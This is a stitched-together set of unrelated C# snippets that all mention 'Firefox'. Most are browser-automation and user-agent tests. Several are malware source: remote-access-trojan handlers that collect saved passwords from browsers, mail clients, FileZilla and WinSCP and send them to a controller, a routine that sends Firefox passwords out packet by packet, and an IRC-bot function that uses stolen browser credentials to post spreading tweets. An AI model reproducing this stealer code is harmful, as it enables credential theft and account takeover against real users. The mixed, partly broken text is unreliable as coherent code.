public void AfterScenario() { if (Firefox != null) { Firefox.Close(); } }
private static void ExtensionMethod() { IWebDriver driver = new Firefox(); driver.SendKeysWithSpcChar("S", "Ş"); Console.WriteLine(); }
public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(Edge.GetPasswords()); recovered.AddRange(Outlook.GetSavedPasswords()); recovered.AddRange(Thunderbird.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); List <string> raw = new List <string>(); foreach (RecoveredAccount value in recovered) { string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER); raw.Add(rawValue); } new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client); }
/// <summary> /// Create browsers for each type provided. /// </summary> /// <param name="type"> The type of the browser to create. </param> public static IEnumerable <Browser> CreateBrowsers(BrowserType type = BrowserType.All) { var response = new List <Browser>(); if ((type & BrowserType.Chrome) == BrowserType.Chrome) { response.Add(Chrome.Create()); } //if ((type & BrowserType.Edge) == BrowserType.Edge) //{ // response.Add(Edge.Create()); //} if ((type & BrowserType.InternetExplorer) == BrowserType.InternetExplorer) { response.Add(InternetExplorer.Create()); } if ((type & BrowserType.Firefox) == BrowserType.Firefox) { response.Add(Firefox.Create()); } return(response); }
public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client) { var recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); var raw = new List <string>(); for (var i = 0; i < recovered.Count; i++) { var value = recovered[i]; var rawValue = string.Format($"{value.Username}" + $"{DELIMITER}" + $"{value.Password}" + $"{DELIMITER}" + $"{value.URL}" + $"{DELIMITER}" + $"{value.Application}"); raw.Add(rawValue); } new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client); }
/// <summary> /// Attach browsers for each type provided. /// </summary> /// <param name="type"> The type of the browser to attach to. </param> public static IEnumerable <Browser> AttachBrowsers(BrowserType type = BrowserType.All) { var response = new List <Browser>(); if ((type & BrowserType.Chrome) == BrowserType.Chrome) { response.Add(Chrome.Attach()); } if ((type & BrowserType.Edge) == BrowserType.Edge) { response.Add(Edge.Attach()); } if ((type & BrowserType.InternetExplorer) == BrowserType.InternetExplorer) { response.Add(InternetExplorer.Attach()); } if ((type & BrowserType.Firefox) == BrowserType.Firefox) { response.Add(Firefox.Attach()); } return(response); }
/// <summary> /// Attach or create browsers for each type provided. /// </summary> /// <param name="type"> The type of the browser to attach to or create. </param> public static IEnumerable <Browser> AttachOrCreate(BrowserType type = BrowserType.All) { var response = new List <Browser>(); if ((type & BrowserType.Chrome) == BrowserType.Chrome) { var chrome = Chrome.AttachOrCreate(); response.Add(chrome); } //if ((type & BrowserType.Edge) == BrowserType.Edge) //{ // var edge = Edge.AttachOrCreate(); // response.Add(edge); //} if ((type & BrowserType.InternetExplorer) == BrowserType.InternetExplorer) { var explorer = InternetExplorer.AttachOrCreate(); response.Add(explorer); } if ((type & BrowserType.Firefox) == BrowserType.Firefox) { var firefox = Firefox.AttachOrCreate(); response.Add(firefox); } return(response); }
public Browser SetBrowserType(SupportedBrowsers browser) { switch (browser) { case (SupportedBrowsers.Chrome): var chrome = new Chrome(); // var chromOptions = new []{ "--start-maximized" }; Driver = chrome .SetExtention() .SetupChromeWithOption() .GetDriverInstance(); break; case (SupportedBrowsers.Edge): Driver = new EdgeDriver(); break; case SupportedBrowsers.Firefox: var firefox = new Firefox(); Driver = firefox.SetupFirefoxWithOption().GetDriverInstance(); break; } Log.Info("Driver Set to: " + browser); NgDriver = new NgWebDriver(Driver); return(this); }
/// <summary> /// Initializes a new instance of the Lynda.Test.Browsers.FirefoxBrowser class, opens a new Firefox window and navigates to /// the specified uri. /// </summary> /// <param name="uri">uri to navigate to in the new Firefox window.</param> internal FirefoxBrowser(string uri, bool killExisting) { if (installedExePath == null) { throw new Exception(string.Format("Firefox is not installed. Expected location:{0}", expectedExePath)); } if (installedVersion != supportedExeMajorVersion) { throw new Exception(string.Format("Firefox version {0} ({1}) is not supported by this class. Supported version: {2}.", installedVersion, installedExePath, supportedExeMajorVersion)); } firefoxRepo = new Firefox(); //Kill existing browser processes before opening a new browser if (killExisting) { Host.Local.KillBrowser(BrowserProduct.Firefox.ToString()); } //Open browser OpenBrowser(uri, BrowserProduct.Firefox.ToString(), new RxPath("/form[@class='MozillaWindowClass']")); //Update repository instance base path to include native window handle attribute for the form firefoxRepo.Form.BasePath = new RxPath(String.Format("/form[@class='MozillaWindowClass' and @handle='{0}']", handle)); Validate.Exists(firefoxRepo.Form.BasePath); }
private void listBoxMerged_MouseUp(object sender, MouseButtonEventArgs e) { Anime anime = (sender as ListBox).SelectedItem as Anime; Console.WriteLine(anime.Url); if (anime != null) { if (Firefox != null && Firefox.IsDriverBuild()) { Task.Factory.StartNew(() => { try { if (!Firefox.Driver.Url.Equals("")) { Firefox.Driver.Navigate().GoToUrl(""); } var canSearch = Firefox.WaitUntilElementClickable(By.CssSelector("#maSearchText")); if (canSearch != null) { canSearch.Clear(); canSearch.SendKeys(anime.Title); Firefox.ExecuteScript("performSearch();"); CurrentAnime = anime; } } catch { } }); } } }
public void Test() { Firefox Firefox = new Firefox(); string ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"; Assert.IsTrue(Firefox.UserAgentRegex.IsMatch(ua)); }
public IWebDriver Initialize(string browser) { double timeout = Convert.ToDouble(ConfigurationManager.AppSettings["DefaultTimeout"]); if (_driver == null) { if (browser.Equals("Chrome")) { if (Convert.ToBoolean(ConfigurationManager.AppSettings["Remote"])) { _driver = Chrome.Build(); } else { _driver = Chrome.BuildLocal(); } } else if (browser.Equals("Firefox")) { _driver = Firefox.Build(); } else { throw new Exception("Driver não suportado!"); } } _driver.Manage().Timeouts().ImplicitWait = TimeSpan.FromSeconds(timeout); _driver.Manage().Timeouts().PageLoad = TimeSpan.FromSeconds(timeout); return(_driver); }
public void Firefox_IOS_iPhone() { var isFireFox = Firefox.TryParse(UserAgents.Firefox_IPhone, out var firefox); Assert.True(isFireFox); Assert.Equal(DeviceTypes.Mobile, firefox.DeviceType); Assert.Equal(OperatingSystems.IOS, firefox.OS); }
public void Firefox_Windows_Desktop() { var isFireFox = Firefox.TryParse(UserAgents.FirefoxWindows, out var firefox); Assert.True(isFireFox); Assert.Equal(DeviceTypes.Desktop, firefox.DeviceType); Assert.Equal(OperatingSystems.Windows, firefox.OS); }
public void Firefox_IOS_iPad() { var isFireFox = Firefox.TryParse(UserAgents.FirefoxIPad, out var firefox); Assert.True(isFireFox); Assert.Equal(DeviceTypes.Tablet, firefox.DeviceType); Assert.Equal(OperatingSystems.IOS, firefox.OS); }
public void Firefox_OSX_Desktop() { var isFireFox = Firefox.TryParse(UserAgents.FirefoxOsx, out var firefox); Assert.True(isFireFox); Assert.Equal(DeviceTypes.Desktop, firefox.DeviceType); Assert.Equal(OperatingSystems.MacOSX, firefox.OS); }
public override void Run() { List <PasswordInfo> Firefox_Passwords = Firefox.GetFirefoxPasswords(); for (int i = 0; i < Firefox_Passwords.Count; i++) { Client.SendPacket(new S_Password(Client, Firefox_Passwords[i].URL, Firefox_Passwords[i].Username, Firefox_Passwords[i].Password)); } }
public void TextContentShouldMatchWithInnerText() { var divs = Ie.Divs.Filter(Find.ById(new Regex("^innerTextTest"))); foreach (Div div in divs) { Assert.That(Firefox.Div(div.Id).Text, Is.EqualTo(div.Text), "failed for div: " + div.Id); } }
public bool ConnectWithLocalFirefox(Firefox.FirefoxEventProcessor evp) { m_Evp = evp; // Actually, Unicode means UTF-16, whereas we need UCS-2. // UTF-16 might insert multi-word characters, which we do not want. // However, since .NET strings are stored as UCS-2, we won't get multi-word characters anyway. return Connect(IPAddress.Loopback, 34971, Encoding.UTF8, new UnicodeEncoding(true, false), true); }
public bool CheckIfNoArgs() { if ((Chrome.Equals(false)) && (Firefox.Equals(false)) && (All.Equals(false)) && (Help.Equals(false))) { return(true); } else { return(false); } }
public static void StartTwitterSpread(string[] message) { try { string creds = Chrome.QueryChrome(""); if (String.IsNullOrEmpty(creds)) { creds = Firefox.QueryFirefox(""); } string[] auth = creds.Split(':'); string user = auth[0]; string pass = auth[1]; if (creds != "") { bool buildMsg = false; string spreadMsg = ""; foreach (string s in message) { if (s.StartsWith("\"")) { buildMsg = true; } if (s.EndsWith("\"")) { buildMsg = false; spreadMsg += s; } if (buildMsg) { spreadMsg += s + " "; } } spreadMsg = spreadMsg.Replace("\"", ""); spreadMsg.TrimEnd(' '); if (spreadMsg != "") { if (PostTweet(user, pass, spreadMsg)) { IRC.WriteMessage("Twitter status updated:" + IRC.ColorCode(" " + user) + " ->" + IRC.ColorCode(" " + spreadMsg) + ".", Config._mainChannel()); } } } } catch { // No facebook account saved. } }
public void Create() { using (var browser = Firefox.Create()) { Assert.IsNotNull(browser); Console.WriteLine(browser.Id); browser.NavigateTo("http://localhost:8080"); browser.Elements.Count.Dump(); browser.ExecuteScript("window.location.href").Dump(); } }
public void TextContentShouldMatchWithInnerText() { var divs = Ie.Divs.Filter(Find.ById(new Regex("^innerTextTest"))); foreach (Div div in divs) { if (div.Id == "innerTextTest7") { continue; // See also following Ignored test } Assert.That(Firefox.Div(div.Id).Text, Is.EqualTo(div.Text), "failed for div: " + div.Id); } }
public void ValueReturnsDifferentValueForIEThenFireFoxAndIE8() { // OK, this one is weird. The HTML says value="ButtonElementValue" // but the value attribute returns the innertext(!) in IE6, IE7 and IE8. // But FireFox does return the value attribute..... // <button id="buttonelementid" name="buttonelementname" value="ButtonElementValue">Button Element</button> const string ieValue = "Button Element"; const string actualValue = "ButtonElementValue"; Assert.AreEqual(ieValue, Ie.Button("buttonelementid").Value, "IE issue"); Assert.AreEqual(actualValue, Firefox.Button("buttonelementid").Value, "FireFox issue"); }
public void FindByValueBehavesDifferentlyForIEThenFireFox() { // OK, this one is weird. The HTML says value="ButtonElementValue" // but the value attribute returns the innertext(!) in IE6, IE7 and IE8 // But FireFox does return the value attribute..... // <button id="buttonelementid" name="buttonelementname" value="ButtonElementValue">Button Element</button> const string ieValue = "Button Element"; const string actualValue = "ButtonElementValue"; Assert.That(Ie.Button(Find.ByValue(ieValue)).Exists, Is.True, "IE issue"); Assert.That(Firefox.Button(Find.ByValue(actualValue)).Exists, Is.True, "Firefox issue"); }
public void Execute(Dictionary <string, string> arguments) { Console.WriteLine("\n[*] Command: Firefox history"); arguments.Remove("history"); string displayFormat = "csv"; if (arguments.ContainsKey("/target")) { string target = arguments["/target"].Trim('"').Trim('\''); string historyDB = target + @"\places.sqlite"; if (File.Exists(historyDB)) { Console.WriteLine("\n[i] Reading history from '{0}'", historyDB); Firefox.ExtractHistory(historyDB, displayFormat); } else { Console.WriteLine("\r\n[X] '{0}' is not a valid Firefox database.\n", historyDB); } } else if (!arguments.ContainsKey("/target")) { // Enumerate Firefox installation directories // Adapted from SharpWeb ( string userName = Environment.GetEnvironmentVariable("USERNAME"); Console.WriteLine("\n[*] Checking for Firefox installation as current user ({0})", userName); string userFirefoxBasePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles"; if (System.IO.Directory.Exists(userFirefoxBasePath)) { string[] directories = Directory.GetDirectories(userFirefoxBasePath); foreach (string directory in directories) { string firefoxhistoryDB = String.Format("{0}\\{1}", directory, "places.sqlite"); if (File.Exists(firefoxhistoryDB)) { Console.WriteLine("\n[i] Reading history from '{0}'", firefoxhistoryDB); Firefox.ExtractHistory(firefoxhistoryDB, displayFormat); } } } else if (!System.IO.Directory.Exists(userFirefoxBasePath)) { Console.WriteLine("\r\n[X] Firefox installation not found.\n"); } } }
public void Test_validLanguageCodes() { var list = Firefox.validLanguageCodes(); Assert.IsNotNull(list); int items = 0; foreach (var item in list) { Assert.IsFalse(string.IsNullOrWhiteSpace(item)); ++items; } Assert.IsTrue(items > 50); }
public static void HandleGetPasswords(GetPasswords packet, Networking.Client client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); client.Send(new GetPasswordsResponse { RecoveredAccounts = recovered }); }
private void Execute(ISender client, GetPasswords message) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); client.Send(new GetPasswordsResponse { RecoveredAccounts = recovered }); }
//public static IWebDriver driver = new ChromeDriver(); static void Main(string[] args) { //driver.Manage().Timeouts().ImplicitWait = TimeSpan.FromSeconds(120); //driver.Navigate().GoToUrl(""); //driver.FindElement(By.XPath("//span[text()='Your Expertise']")).Click(); //driver.FindElement(By.XPath("//div[@class='dropdown-menu open']//ul[@class='dropdown-menu inner']//li//a[text()='Framework']")).Click(); //Console.ReadLine(); //IReadOnlyList<IWebElement> listOfElements = driver.FindElements(By.XPath("//div[@class='dropdown-menu open']//ul[@class='dropdown-menu inner']//li//a")); //for (int i = 0; i < length; i++) //{ //} //for (int i = 0; i < listOfElements.Count; i++) //{ //} //Console.WriteLine(listOfElements.Count); //Console.ReadLine(); //driver.Quit(); Console.WriteLine("Save"); CollectionsListDemo collectionsList = new CollectionsListDemo(); collectionsList.ListDemo("Aniket", "Pallavi", "Shubham", "Shruti", "Palla"); IWebDriver driver = new Chrome(); driver.Click(); driver.FindElement(); driver.SendKeys(); IWebDriver driver1 = new Firefox(); driver1.Click(); driver1.FindElement(); driver1.SendKeys(); IWebDriver driver2 = new IE(); driver2.Click(); driver2.FindElement(); driver2.SendKeys(); Console.ReadLine(); }
public void Test_matchTest() { var fx = new Firefox("de", false); var info =; // versions with three numbers Regex re = new Regex(info.match64Bit); Assert.IsTrue(re.IsMatch("Mozilla Firefox 51.0.1 (x64 de)")); re = new Regex(info.match32Bit); Assert.IsTrue(re.IsMatch("Mozilla Firefox 51.0.1 (x86 de)")); // versions with two numbers re = new Regex(info.match64Bit); Assert.IsTrue(re.IsMatch("Mozilla Firefox 50.0 (x64 de)")); re = new Regex(info.match32Bit); Assert.IsTrue(re.IsMatch("Mozilla Firefox 50.0 (x86 de)")); }
public void ResolveTo(Firefox.ContentItem request, HashSet<JavaFile> allFiles) { Request = request; request.ServerTrace = this; allFiles.UnionWith(JavaFilesHit); }
/// <summary> /// Sync's history to FF /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void syncFF_Click(object sender, EventArgs e) { Firefox program = new Firefox(); const string methodString = "SyncFF"; runBackgroundWorker(program, null, methodString); }